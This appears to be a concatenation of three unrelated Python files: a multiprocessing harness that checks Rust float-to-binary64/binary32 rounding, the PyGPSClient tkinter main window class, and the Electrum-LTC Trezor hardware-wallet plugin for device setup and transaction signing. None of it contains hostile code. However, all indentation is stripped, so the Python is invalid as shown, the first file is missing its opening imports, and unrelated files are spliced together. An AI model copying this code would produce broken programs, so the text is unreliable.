import binascii
try: # Python 3
import queue as Queue
except ImportError: # Python 2
import Queue
NUM_WORKERS = 2
UPDATE_EVERY_N = 50000
INF = namedtuple('INF', '')()
NEG_INF = namedtuple('NEG_INF', '')()
ZERO = namedtuple('ZERO', '')()
MAILBOX = None # The queue for reporting errors to the main process.
STDOUT_LOCK = threading.Lock()
test_name = None
child_processes = []
exit_status = 0
def msg(*args):
with STDOUT_LOCK:
print("[" + test_name + "]", *args)
sys.stdout.flush()
def write_errors():
global exit_status
f = open("errors.txt", 'w')
have_seen_error = False
while True:
args = MAILBOX.get()
if args is None:
f.close()
break
print(*args, file=f)
f.flush()
if not have_seen_error:
have_seen_error = True
msg("Something is broken:", *args)
msg("Future errors logged to errors.txt")
exit_status = 101
def projectdir():
file = os.path.realpath(__file__)
return os.path.dirname(os.path.dirname(file))
def targetdir():
return os.path.join(projectdir(), 'target')
def releasedir():
return os.path.join(targetdir(), 'release')
def cargo():
path = os.getcwd()
os.chdir(projectdir())
check_call(['cargo', 'build', '--release'])
os.chdir(path)
def run(test):
global test_name
test_name = test
t0 = time.perf_counter()
msg("setting up supervisor")
command = ['cargo', 'run', '--bin', test, '--release']
proc = Popen(command, bufsize=1<<20 , stdin=PIPE, stdout=PIPE, stderr=PIPE)
done = multiprocessing.Value(ctypes.c_bool)
queue = multiprocessing.Queue(maxsize=5)#(maxsize=1024)
workers = []
for n in range(NUM_WORKERS):
worker = multiprocessing.Process(name='Worker-' + str(n + 1),
target=init_worker,
args=[test, MAILBOX, queue, done])
workers.append(worker)
child_processes.append(worker)
for worker in workers:
worker.start()
msg("running test")
interact(proc, queue)
with done.get_lock():
done.value = True
for worker in workers:
worker.join()
msg("python is done")
assert queue.empty(), "did not validate everything"
dt = time.perf_counter() - t0
msg("took", round(dt, 3), "seconds")
def interact(proc, queue):
n = 0
while proc.poll() is None:
line = proc.stdout.readline()
if not line:
continue
assert line.endswith(b'\n'), "incomplete line: " + repr(line)
queue.put(line)
n += 1
if n % UPDATE_EVERY_N == 0:
msg("got", str(n // 1000) + "k", "records")
msg("rust is done. exit code:", proc.returncode)
rest, stderr = proc.communicate()
if stderr:
msg("rust stderr output:", stderr)
for line in rest.split(b'\n'):
if not line:
continue
queue.put(line)
def main():
global MAILBOX
files = glob(f'{projectdir()}/test-parse-random/*.rs')
basenames = [os.path.basename(i) for i in files]
all_tests = [os.path.splitext(f)[0] for f in basenames if not f.startswith('_')]
args = sys.argv[1:]
if args:
tests = [test for test in all_tests if test in args]
else:
tests = all_tests
if not tests:
print("Error: No tests to run")
sys.exit(1)
# Compile first for quicker feedback
cargo()
# Set up mailbox once for all tests
MAILBOX = multiprocessing.Queue()
mailman = threading.Thread(target=write_errors)
mailman.daemon = True
mailman.start()
for test in tests:
run(test)
MAILBOX.put(None)
mailman.join()
# ---- Worker thread code ----
POW2 = { e: Fraction(2) ** e for e in range(-1100, 1100) }
HALF_ULP = { e: (Fraction(2) ** e)/2 for e in range(-1100, 1100) }
DONE_FLAG = None
def send_error_to_supervisor(*args):
MAILBOX.put(args)
def init_worker(test, mailbox, queue, done):
global test_name, MAILBOX, DONE_FLAG
test_name = test
MAILBOX = mailbox
DONE_FLAG = done
do_work(queue)
def is_done():
with DONE_FLAG.get_lock():
return DONE_FLAG.value
def do_work(queue):
while True:
try:
line = queue.get(timeout=0.01)
except Queue.Empty:
if queue.empty() and is_done():
return
else:
continue
bin64, bin32, text = line.rstrip().split()
validate(bin64, bin32, text.decode('utf-8'))
def decode_binary64(x):
"""
Turn a IEEE 754 binary64 into (mantissa, exponent), except 0.0 and
infinity (positive and negative), which return ZERO, INF, and NEG_INF
respectively.
"""
x = binascii.unhexlify(x)
assert len(x) == 8, repr(x)
[bits] = struct.unpack(b'>Q', x)
if bits == 0:
return ZERO
exponent = (bits >> 52) & 0x7FF
negative = bits >> 63
low_bits = bits & 0xFFFFFFFFFFFFF
if exponent == 0:
mantissa = low_bits
exponent += 1
if mantissa == 0:
return ZERO
elif exponent == 0x7FF:
assert low_bits == 0, "NaN"
if negative:
return NEG_INF
else:
return INF
else:
mantissa = low_bits | (1 << 52)
exponent -= 1023 + 52
if negative:
mantissa = -mantissa
return (mantissa, exponent)
def decode_binary32(x):
"""
Turn a IEEE 754 binary32 into (mantissa, exponent), except 0.0 and
infinity (positive and negative), which return ZERO, INF, and NEG_INF
respectively.
"""
x = binascii.unhexlify(x)
assert len(x) == 4, repr(x)
[bits] = struct.unpack(b'>I', x)
if bits == 0:
return ZERO
exponent = (bits >> 23) & 0xFF
negative = bits >> 31
low_bits = bits & 0x7FFFFF
if exponent == 0:
mantissa = low_bits
exponent += 1
if mantissa == 0:
return ZERO
elif exponent == 0xFF:
if negative:
return NEG_INF
else:
return INF
else:
mantissa = low_bits | (1 << 23)
exponent -= 127 + 23
if negative:
mantissa = -mantissa
return (mantissa, exponent)
MIN_SUBNORMAL_DOUBLE = Fraction(2) ** -1074
MIN_SUBNORMAL_SINGLE = Fraction(2) ** -149 # XXX unsure
MAX_DOUBLE = (2 - Fraction(2) ** -52) * (2 ** 1023)
MAX_SINGLE = (2 - Fraction(2) ** -23) * (2 ** 127)
MAX_ULP_DOUBLE = 1023 - 52
MAX_ULP_SINGLE = 127 - 23
DOUBLE_ZERO_CUTOFF = MIN_SUBNORMAL_DOUBLE / 2
DOUBLE_INF_CUTOFF = MAX_DOUBLE + 2 ** (MAX_ULP_DOUBLE - 1)
SINGLE_ZERO_CUTOFF = MIN_SUBNORMAL_SINGLE / 2
SINGLE_INF_CUTOFF = MAX_SINGLE + 2 ** (MAX_ULP_SINGLE - 1)
def validate(bin64, bin32, text):
try:
double = decode_binary64(bin64)
except AssertionError:
print(bin64, bin32, text)
raise
single = decode_binary32(bin32)
real = Fraction(text)
if double is ZERO:
if real > DOUBLE_ZERO_CUTOFF:
record_special_error(text, "f64 zero")
elif double is INF:
if real < DOUBLE_INF_CUTOFF:
record_special_error(text, "f64 inf")
elif double is NEG_INF:
if -real < DOUBLE_INF_CUTOFF:
record_special_error(text, "f64 -inf")
elif len(double) == 2:
sig, k = double
validate_normal(text, real, sig, k, "f64")
else:
assert 0, "didn't handle binary64"
if single is ZERO:
if real > SINGLE_ZERO_CUTOFF:
record_special_error(text, "f32 zero")
elif single is INF:
if real < SINGLE_INF_CUTOFF:
record_special_error(text, "f32 inf")
elif single is NEG_INF:
if -real < SINGLE_INF_CUTOFF:
record_special_error(text, "f32 -inf")
elif len(single) == 2:
sig, k = single
validate_normal(text, real, sig, k, "f32")
else:
assert 0, "didn't handle binary32"
def record_special_error(text, descr):
send_error_to_supervisor(text.strip(), "wrongly rounded to", descr)
def validate_normal(text, real, sig, k, kind):
approx = sig * POW2[k]
error = abs(approx - real)
if error > HALF_ULP[k]:
record_normal_error(text, error, k, kind)
def record_normal_error(text, error, k, kind):
one_ulp = HALF_ULP[k + 1]
assert one_ulp == 2 * HALF_ULP[k]
relative_error = error / one_ulp
text = text.strip()
try:
err_repr = float(relative_error)
except ValueError:
err_repr = str(err_repr).replace('/', ' / ')
send_error_to_supervisor(err_repr, "ULP error on", text, "(" + kind + ")")
if __name__ == '__main__':
main()
|
app.py | """
PyGPSClient - Main tkinter application class.
Created on 12 Sep 2020
:author: semuadmin
:copyright: SEMU Consulting © 2020
:license: BSD 3-Clause
"""
from threading import Thread
from tkinter import Tk, Frame, N, S, E, W, PhotoImage, font
from .strings import (
TITLE,
MENUHIDESE,
MENUSHOWSE,
MENUHIDESB,
MENUSHOWSB,
MENUHIDECON,
MENUSHOWCON,
MENUHIDEMAP,
MENUSHOWMAP,
MENUHIDESATS,
MENUSHOWSATS,
INTROTXTNOPORTS,
)
from ._version import __version__
from .about_dialog import AboutDialog
from .banner_frame import BannerFrame
from .console_frame import ConsoleFrame
from .filehandler import FileHandler
from .globals import ICON_APP, DISCONNECTED
from .graphview_frame import GraphviewFrame
from .map_frame import MapviewFrame
from .menu_bar import MenuBar
from .serial_handler import SerialHandler
from .settings_frame import SettingsFrame
from .skyview_frame import SkyviewFrame
from .status_frame import StatusFrame
from .ubx_config_dialog import UBXConfigDialog
from .nmea_handler import NMEAHandler
from .ubx_handler import UBXHandler
VERSION = __version__
class App(Frame): # pylint: disable=too-many-ancestors
"""
Main PyGPSClient GUI Application Class
"""
def __init__(self, master, *args, **kwargs):
"""
Set up main application and add frames
:param tkinter.Tk master: reference to Tk root
:param args: optional args to pass to Frame parent class
:param kwargs: optional kwargs to pass to Frame parent class
"""
self.__master = master
Frame.__init__(self, self.__master, *args, **kwargs)
self.__master.protocol("WM_DELETE_WINDOW", self.exit)
self.__master.title(TITLE)
self.__master.iconphoto(True, PhotoImage(file=ICON_APP))
# Set initial widget visibility
self._show_settings = True
self._show_ubxconfig = False
self._show_status = True
self._show_console = True
self._show_map = True
self._show_sats = True
# Instantiate protocol handler classes
self.file_handler = FileHandler(self)
self.serial_handler = SerialHandler(self)
self.nmea_handler = NMEAHandler(self)
self.ubx_handler = UBXHandler(self)
self.dlg_ubxconfig = None
self._config_thread = None
# Load web map api key if there is one
self.api_key = self.file_handler.load_apikey()
self._body()
self._do_layout()
self._attach_events()
# Initialise widgets
self.frm_satview.init_sats()
self.frm_graphview.init_graph()
self.frm_banner.update_conn_status(DISCONNECTED)
def _body(self):
"""
Set up frame and widgets
"""
# these grid weights are what gives the grid its
# 'pack to window size' behaviour
self.__master.grid_columnconfigure(0, weight=1)
self.__master.grid_columnconfigure(1, weight=2)
self.__master.grid_columnconfigure(2, weight=2)
self.__master.grid_rowconfigure(0, weight=0)
self.__master.grid_rowconfigure(1, weight=2)
self.__master.grid_rowconfigure(2, weight=1)
self._set_default_fonts()
self.menu = MenuBar(self)
self.frm_status = StatusFrame(self, borderwidth=2, relief="groove")
self.frm_banner = BannerFrame(self, borderwidth=2, relief="groove")
self.frm_settings = SettingsFrame(self, borderwidth=2, relief="groove")
self.frm_console = ConsoleFrame(self, borderwidth=2, relief="groove")
self.frm_mapview = MapviewFrame(self, borderwidth=2, relief="groove")
self.frm_satview = SkyviewFrame(self, borderwidth=2, relief="groove")
self.frm_graphview = GraphviewFrame(self, borderwidth=2, relief="groove")
self.__master.config(menu=self.menu)
def _do_layout(self):
"""
Arrange widgets in main application frame
"""
self.frm_banner.grid(
column=0, row=0, columnspan=5, padx=2, pady=2, sticky=(N, S, E, W)
)
self._grid_console()
self._grid_sats()
self._grid_map()
self._grid_status()
self._grid_settings()
if self.frm_settings.serial_settings().noports:
self.set_status(INTROTXTNOPORTS, "red")
def _attach_events(self):
"""
Bind events to main application
"""
self.__master.bind("<<ubx_read>>", self.serial_handler.on_read)
self.__master.bind("<<ubx_readfile>>", self.serial_handler.on_read)
self.__master.bind("<<ubx_eof>>", self.serial_handler.on_eof)
self.__master.bind_all("<Control-q>", self.exit)
def _set_default_fonts(self):
"""
Set default fonts for entire application
"""
# pylint: disable=attribute-defined-outside-init
self.font_vsm = font.Font(size=8)
self.font_sm = font.Font(size=10)
self.font_md = font.Font(size=12)
self.font_md2 = font.Font(size=14)
self.font_lg = font.Font(size=18)
def toggle_settings(self):
"""
Toggle Settings Frame on or off
"""
self._show_settings = not self._show_settings
self._grid_settings()
def _grid_settings(self):
"""
Set grid position of Settings Frame
"""
if self._show_settings:
self.frm_settings.grid(
column=4, row=1, rowspan=2, padx=2, pady=2, sticky=(N, W, E)
)
self.menu.view_menu.entryconfig(0, label=MENUHIDESE)
else:
self.frm_settings.grid_forget()
self.menu.view_menu.entryconfig(0, label=MENUSHOWSE)
def toggle_status(self):
"""
Toggle Status Bar on or off
"""
self._show_status = not self._show_status
self._grid_status()
def _grid_status(self):
"""
Position Status Bar in grid
"""
if self._show_status:
self.frm_status.grid(
column=0, row=3, columnspan=5, padx=2, pady=2, sticky=(W, E)
)
self.menu.view_menu.entryconfig(1, label=MENUHIDESB)
else:
self.frm_status.grid_forget()
self.menu.view_menu.entryconfig(1, label=MENUSHOWSB)
def toggle_console(self):
"""
Toggle Console frame on or off
"""
self._show_console = not self._show_console
self._grid_console()
self._grid_sats()
self._grid_map()
def _grid_console(self):
"""
Position Console Frame in grid
"""
if self._show_console:
self.frm_console.grid(
column=0, row=1, columnspan=4, padx=2, pady=2, sticky=(N, S, E, W)
)
self.menu.view_menu.entryconfig(2, label=MENUHIDECON)
else:
self.frm_console.grid_forget()
self.menu.view_menu.entryconfig(2, label=MENUSHOWCON)
def toggle_sats(self):
"""
Toggle Satview and Graphview frames on or off
"""
self._show_sats = not self._show_sats
self._grid_sats()
self._grid_map()
def _grid_sats(self):
"""
Position Satview and Graphview Frames in grid
"""
if self._show_sats:
self.frm_satview.grid(column=0, row=2, padx=2, pady=2, sticky=(N, S, E, W))
self.frm_graphview.grid(
column=1, row=2, padx=2, pady=2, sticky=(N, S, E, W)
)
self.menu.view_menu.entryconfig(4, label=MENUHIDESATS)
else:
self.frm_satview.grid_forget()
self.frm_graphview.grid_forget()
self.menu.view_menu.entryconfig(4, label=MENUSHOWSATS)
def toggle_map(self):
"""
Toggle Map Frame on or off
"""
self._show_map = not self._show_map
self._grid_map()
def _grid_map(self):
"""
Position Map Frame in grid
"""
if self._show_map:
self.frm_mapview.grid(column=2, row=2, padx=2, pady=2, sticky=(N, S, E, W))
self.menu.view_menu.entryconfig(3, label=MENUHIDEMAP)
else:
self.frm_mapview.grid_forget()
self.menu.view_menu.entryconfig(3, label=MENUSHOWMAP)
def set_connection(self, message, color="blue"):
"""
Sets connection description in status bar.
:param str message: message to be displayed in connection label
:param str color: rgb color string
"""
self.frm_status.set_connection(message, color)
def set_status(self, message, color="black"):
"""
Sets text of status bar
:param str message: message to be displayed in status label
:param str color: rgb color string
"""
self.frm_status.set_status(message, color)
def about(self):
"""
Open About dialog
"""
AboutDialog(self)
def ubxconfig(self):
"""
Start UBX Config dialog thread
"""
self._config_thread = Thread(target=self._ubxconfig_thread, daemon=False)
self._config_thread.start()
def _ubxconfig_thread(self):
"""
THREADED PROCESS UBX Configuration Dialog
"""
self.dlg_ubxconfig = UBXConfigDialog(self)
def stop_config_thread(self):
"""
Stop UBX Configuration dialog thread.
"""
if self._config_thread is not None:
self._config_thread.join()
def get_master(self):
"""
Returns application master (Tk)
:return: reference to application master (Tk)
"""
return self.__master
def exit(self, *args, **kwargs): # pylint: disable=unused-argument
"""
Kill any running processes and quit application
"""
self.serial_handler.stop_read_thread()
self.serial_handler.stop_readfile_thread()
self.stop_config_thread()
self.serial_handler.disconnect()
self.__master.destroy()
if __name__ == "__main__":
ROOT = Tk()
APP = App(ROOT)
ROOT.mainloop()
|
trezor.py | from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_ltc.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_ltc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_ltc import constants
from electrum_ltc.i18n import _
from electrum_ltc.plugins import BasePlugin, Device
from electrum_ltc.transaction import deserialize, Transaction
from electrum_ltc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation
from electrum_ltc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_script_gen(self):
xtype = xtype_from_derivation(self.derivation)
if xtype in ('p2wpkh', 'p2wsh'):
return SCRIPT_GEN_NATIVE_SEGWIT
elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
# Minimal test if python-trezor is installed
import trezorlib
try:
library_version = trezorlib.__version__
except AttributeError:
# python-trezor only introduced __version__ in 0.9.0
library_version = 'unknown'
if library_version == 'unknown' or \
versiontuple(library_version) < self.minimum_library:
self.libraries_available_message = (
_("Library version for '{}' is too old.").format(name)
+ '\nInstalled: {}, Needed: {}'
.format(library_version, self.minimum_library))
self.print_stderr(self.libraries_available_message)
raise ImportError()
self.libraries_available = True
except ImportError:
self.libraries_available = False
return
from . import client
from . import transport
import trezorlib.ckd_public
import trezorlib.messages
self.client_class = client.TrezorClient
self.ckd_public = trezorlib.ckd_public
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Litecoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
pass
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
finally:
wizard.loop.exit(0)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, script_gen, is_multisig):
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
return self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
return self.types.InputScriptType.SPENDP2SHWITNESS
else:
if is_multisig:
return self.types.InputScriptType.SPENDMULTISIG
else:
return self.types.InputScriptType.SPENDADDRESS
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=[change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
